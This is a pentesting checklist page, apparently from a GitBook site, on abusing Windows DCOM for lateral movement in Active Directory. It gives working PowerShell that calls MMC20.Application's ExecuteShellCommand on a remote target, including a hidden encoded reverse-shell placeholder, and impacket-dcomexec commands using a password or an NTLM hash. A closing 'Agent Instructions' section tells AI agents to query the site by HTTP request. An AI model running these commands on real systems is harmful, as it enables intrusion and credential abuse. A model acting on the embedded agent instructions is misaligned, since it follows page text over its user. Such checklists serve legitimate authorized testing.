# DCOM Attack

### Overview

**DCOM (Distributed Component Object Model)** is a Windows technology that allows software components to communicate over the network.

**DCOM uses RPC (port 135 + dynamic high ports)** and COM objects already present on Windows systems.

In Active Directory environments, DCOM can be abused for:

* Remote code execution
* Lateral movement
* Living-off-the-land execution

### Why this Works

Many COM objects:

* Are remotely accessible
* Allow method execution
* Run under privileged contexts

If you have:

* Valid domain credentials
* Local admin rights on a remote machine

You can:

* Instantiate certain COM objects remotely
* Trigger methods that execute commands

Some COM objects allow command execution such as `MMC20.Application` because it allows execution via `Document.ActiveView.ExecuteShellCommand()` .

### Prerequisites

1. Valid domain credentials
2. Local Administrator rights on target
3. RPC (135) reachable
4. DCOM not restricted by firewall

### Methods

**Method 1 (PowerShell DCOM Execution from Windows)**:

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami","7")
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c powershell -nop -w hidden -enc <base64_reverse_shell>","7")
```

**Method 2 (Using Impacket from Linux):**

```bash
impacket-dcomexec corp.com/jeff:Password123@192.168.1.50
OR
impacket-dcomexec -hashes :<NTLM_HASH> corp.com/jeff@192.168.1.50
```

### References

1. <https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/lateral-movement/dcom-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.